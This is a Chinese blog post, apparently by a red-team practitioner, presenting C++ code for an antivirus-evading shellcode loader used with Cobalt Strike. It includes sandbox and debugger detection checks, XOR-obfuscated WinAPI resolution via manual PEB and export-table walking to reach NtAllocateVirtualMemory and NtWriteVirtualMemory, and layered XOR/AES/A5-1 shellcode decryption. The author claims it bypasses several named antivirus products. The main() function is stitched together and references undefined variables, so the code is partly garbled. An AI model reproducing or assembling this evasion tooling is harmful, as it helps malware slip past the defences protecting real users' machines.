Life has its own fate, and meeting may not be accidental.

0%

C++变形免杀初探(二)

发表于 更新于   |   字数统计: 1.3k(字)   |   阅读时长: 7(分) Valine:

这个马子倒是提前就研究好了,但是因为前段时间项目要用到,所以得等项目结束后再发出来,免得杀软检测了。免杀效果还行,不做沙箱对抗的话,常见的麦咖啡、卡巴斯基、小红伞、赛门铁克、defender、天擎都能过。

沙箱对抗


1、枚举进程数

1
2
3
4
5
6
7
8
9
10
bool ProcessesCountNum(){
	DWORD runningProcessesIDs[1024];
	DWORD runningProcessesCountBytes;
	DWORD runningProcessesCount;
	EnumProcesses(runningProcessesIDs, sizeof(runningProcessesIDs), &runningProcessesCountBytes);
	runningProcessesCount = runningProcessesCountBytes / sizeof(DWORD);
	if (runningProcessesCount < 120) 
		return false;
	return true;
}

2、硬盘大小

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// 判断硬盘是否大于200G
bool IsHardDiskBiggerThanNum(){
    DWORD drives = GetLogicalDrives();
    std::vector<std::string> driveLetters;
    for (char letter = 'A'; letter <= 'Z'; letter++){
        DWORD mask = 1 << (letter - 'A');
        if (drives & mask){
            std::string drive = std::string(1, letter) + ":\\";
            driveLetters.push_back(drive);
        }
    }
    double totalSizeInGBm = 0;
    for (const auto& drive : driveLetters){
        ULARGE_INTEGER totalNumberOfBytes;
        ULARGE_INTEGER totalNumberOfFreeBytes; 
        GetDiskFreeSpaceEx(drive.c_str(), nullptr, &totalNumberOfBytes, &totalNumberOfFreeBytes);
        double totalSizeInGB = static_cast<double>(totalNumberOfBytes.QuadPart) / (1024 * 1024 * 1024);
        std::cout << "Drive " << drive << " total size : " << totalSizeInGB << " GB" << std::endl;  
        totalSizeInGBm += totalSizeInGB;
    }
    if (totalSizeInGBm < 220)
        return false;
    return true;
}

3、内存大小

检查总内存是否大于2G

1
2
3
4
5
6
7
8
9
bool IsRAMBiggerThanRma()
{
    MEMORYSTATUSEX memoryStatus;
    memoryStatus.dwLength = sizeof(memoryStatus);
    GlobalMemoryStatusEx(&memoryStatus);
    if (memoryStatus.ullTotalPhys < 2LL * 1024 * 1024 * 1024)
        return false;
    return true;
}

4、检查是否有调试工具

进程查找是否有调试工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bool check_process_is_running(const std::string& proc_name) {
    HANDLE hSnapshot;
    PROCESSENTRY32 pe = {};
    //cout << proc_name.c_str() << endl;
    pe.dwSize = sizeof(pe);
    bool present = false;
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (Process32First(hSnapshot, &pe)) {
        do {
            if (!StrCmpI(pe.szExeFile, proc_name.c_str())) {
                present = true;
                break;
            }
        } while (Process32Next(hSnapshot, &pe));
    }
    CloseHandle(hSnapshot);
    return present;
}

5、检查是否出网

1
2
3
4
5
6
7
8
bool sockhost() {
    boost::asio::io_context io_context;
    tcp::resolver resolver(io_context);
    tcp::resolver::results_type endpoints = resolver.resolve("tongji.baidu.com", "https");
    tcp::socket socket(io_context);
    boost::asio::connect(socket, endpoints);
    return true;
}

WinAPI函数xor隐藏

str变量中存放函数名称,先异或,异或后放入加载器,加载器异或后再自定义函数执行

Win函数名加载器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#include <shlwapi.h>
#include <string.h>

#pragma comment(lib, "Shlwapi.lib")

int cmpUnicodeStr(WCHAR substr[], WCHAR mystr[]) {
  _wcslwr_s(substr, MAX_PATH);
  _wcslwr_s(mystr, MAX_PATH);

  int result = 0;
  if (StrStrW(mystr, substr) != NULL) {
    result = 1;
  }

  return result;
}

typedef UINT(CALLBACK* fnMessageBoxA)(
  HWND   hWnd,
  LPCSTR lpText,
  LPCSTR lpCaption,
  UINT   uType
);


HMODULE myGetModuleHandle(LPCWSTR lModuleName) {
  PEB* pPeb = (PEB*)__readgsqword(0x60);
  PEB_LDR_DATA* Ldr = pPeb->Ldr;
  LIST_ENTRY* ModuleList = &Ldr->InMemoryOrderModuleList; 
  LIST_ENTRY* pStartListEntry = ModuleList->Flink;
  WCHAR mystr[MAX_PATH] = { 0 };
  WCHAR substr[MAX_PATH] = { 0 };
  for (LIST_ENTRY* pListEntry = pStartListEntry; pListEntry != ModuleList; pListEntry = pListEntry->Flink) {
    LDR_DATA_TABLE_ENTRY* pEntry = (LDR_DATA_TABLE_ENTRY*)((BYTE*)pListEntry - sizeof(LIST_ENTRY));
    memset(mystr, 0, MAX_PATH * sizeof(WCHAR));
    memset(substr, 0, MAX_PATH * sizeof(WCHAR));
    wcscpy_s(mystr, MAX_PATH, pEntry->FullDllName.Buffer);
    wcscpy_s(substr, MAX_PATH, lModuleName);
    if (cmpUnicodeStr(substr, mystr)) {
      // returning the DLL base address.
      return (HMODULE)pEntry->DllBase;
    }
  }
  printf("failed to get a handle to %s\n", lModuleName);
  return NULL;
}
FARPROC myGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
  PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
  PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
  PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule + 
  ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  DWORD* addressOfFunctions = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfFunctions);
  WORD* addressOfNameOrdinals = (WORD*)((BYTE*)hModule + exportDirectory->AddressOfNameOrdinals);
  DWORD* addressOfNames = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfNames);
  for (DWORD i = 0; i < exportDirectory->NumberOfNames; ++i) {
    if (strcmp(lpProcName, (const char*)hModule + addressOfNames[i]) == 0) {
      return (FARPROC)((BYTE*)hModule + addressOfFunctions[addressOfNameOrdinals[i]]);
    }
  }

  return NULL;
}
char s_NAVM[] = { 0x23,0x0d,0x32,0x19,0x1c,0x0a };
char s_mb[] = { 0x23,0x0d,0x24,0x07,0x19,0x11 };
char s_dll[] = { 0x03,0x0d,0x17,0x19 };
char s_key[] = "xxx";
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
  int j;
  j = 0;
  for (int i = 0; i < data_len; i++) {
    if (j == key_len - 1) j = 0;
    data[i] = data[i] ^ key[j];
    j++;
  }
}
int main(int argc, char* argv[]) {
  XOR((char *) s_dll, sizeof(s_dll), s_key, sizeof(s_key));
  XOR((char *) s_mb, sizeof(s_mb), s_key, sizeof(s_key));
  wchar_t wtext[20];
  mbstowcs(wtext, s_dll, strlen(s_dll)+1); //plus null
  LPWSTR user_dll = wtext;
  HMODULE mod = myGetModuleHandle(user_dll);
    XOR((char*)encryptedpad_len, my_secret_key, sizeof(my_secret_key));
    a5_1_decrypt(key, key_len, encrypted, pad_len, decrypted);
    XOR((char*)s_NAVM, sizeof(s_NAVM), s_key, sizeof(s_key));
    XOR((char*)s_dll, sizeof(s_dll), s_key, sizeof(s_key));
    XOR((char*)s_mb, sizeof(s_mb), s_key, sizeof(s_key));
    wchar_t wtext[20];
    mbstowcs(wtext, s_dll, strlen(s_dll) + 1); //plus null
    LPWSTR ntdll_dll = wtext;
    HMODULE mod = myGetModuleHandle(ntdll_dll);
    pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)myGetProcAddress(mod, (LPCSTR)s_NAVM);
    pNtWriteVirtualMemory NtWriteVirtualMemory = (pNtWriteVirtualMemory)myGetProcAddress(mod, (LPCSTR)s_mb);
  return 0;
}

shellcode加密

XOR+DES+a5_1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
void a5_1_decrypt(unsigned char* key, int key_len, unsigned char* cipher, int cipher_len, unsigned char* out) {
    // initialization
    unsigned int R1 = 0, R2 = 0, R3 = 0;
    for (int i = 0; i < 64; i++) {
        int feedback = ((key[i % key_len] >> (i / 8)) & 1) ^ ((R1 >> 18) & 1) ^ ((R2 >> 21) & 1) ^ ((R3 >> 22) & 1);
        R1 = (R1 << 1) | feedback;
        R2 = (R2 << 1) | ((R1 >> 8) & 1);
        R3 = (R3 << 1) | ((R2 >> 10) & 1);
    }
    // decryption
    for (int i = 0; i < cipher_len; i++) {
        int feedback = A5_STEP((R1 >> 8) & 1, (R2 >> 10) & 1, (R3 >> 10) & 1);
        unsigned char key_byte = 0;
        for (int j = 0; j < 8; j++) {
            int bit = A5_STEP((R1 >> 18) & 1, (R2 >> 21) & 1, (R3 >> 22) & 1) ^ feedback;
            key_byte |= bit << j;
            R1 = (R1 << 1) | bit;
            R2 = (R2 << 1) | ((R1 >> 8) & 1);
            R3 = (R3 << 1) | ((R2 >> 10) & 1);
        }
        out[i] = cipher[i] ^ key_byte;
    }
}
void XOR(char* data, size_t data_len, char* key, size_t key_len) {
    int j;
    j = 0;
    for (int i = 0; i < data_len; i++) {
        if (j == key_len - 1) j = 0;
        data[i] = data[i] ^ key[j];
        j++;
    }
}
int deAES() {


    try
    {
        // decrypt with ECB mode
        ECB_Mode< AES >::Decryption d;
        d.SetKey(key, sizeof(key));
        StringSource(strPlain, true,
            new HexDecoder(
                new StringSink(strCipher)
            ) //
        );
        // The StreamTransformationFilter removes padding as required.
        StringSource s(strCipher, true,
            new StreamTransformationFilter(d,
                new StringSink(strRecovered) // StringSink
            ) // StreamTransformationFilter
        ); // StringSource
    }
    catch (const Exception& e)
    {
        cerr << e.what() << endl;
        exit(1);
    }

    return 0;
}

完整代码就不在这里一一展现了,核心代码都给了,免杀是一个持久化的过程,任何免杀效果在长期来看都是无意义的,主要是学习一个免杀思路。

免杀情况展示

用的是原版CS

参考文章

木马绕过虚拟机

免杀